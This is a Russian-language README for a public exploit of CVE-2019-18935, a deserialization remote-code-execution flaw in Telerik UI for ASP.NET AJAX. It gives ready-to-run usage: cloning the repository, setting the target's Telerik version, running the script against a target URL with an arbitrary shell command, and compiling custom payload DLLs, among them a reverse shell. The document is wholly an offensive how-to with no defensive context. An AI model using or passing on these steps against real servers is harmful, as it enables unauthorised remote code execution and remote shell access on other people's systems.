
Эксплойт для CVE-2019-18935
Эксплойт удаленного выполнения кода для Telerik UI ASP.NET AJAX через уязвимость десериализации.
git clone https://github.com/menashe12346/CVE-2019-18935.git
cd CVE-2019-18935
CVE-2019-18935.py измените строку 15:version = "2017.1.228" # Замените на версию Telerik целевого сервера
python CVE-2019-18935.py <target_url> <shell_command>
# Пример:
python CVE-2019-18935.py http://<HOST>/Telerik.Web.UI.WebResource.axd?type=rau "whoami"
🔧 Сборка пользовательских DLL-файлов
Чтобы создать DLL из другого C-файла (не только reverse shell):
Установите Visual Studio (разработка классических приложений на C++) со следующими компонентами:
Соберите DLL:
build-dll.bat your_file.c
DLL будет создана в каталоге payloads/.
📋 Описание файлов
CVE-2019-18935_exploit/
├── CVE-2019-18935.py # Основной код эксплойта
├── RAU_crypto.py # Модуль шифрования/дешифрования Telerik
├── build-dll.bat # Скрипт для сборки DLL из C-кода
├── reverse_shell.c # Исходный код C для reverse shell
└── payloads/ # Каталог для скомпилированных DLL-файлов полезной нагрузки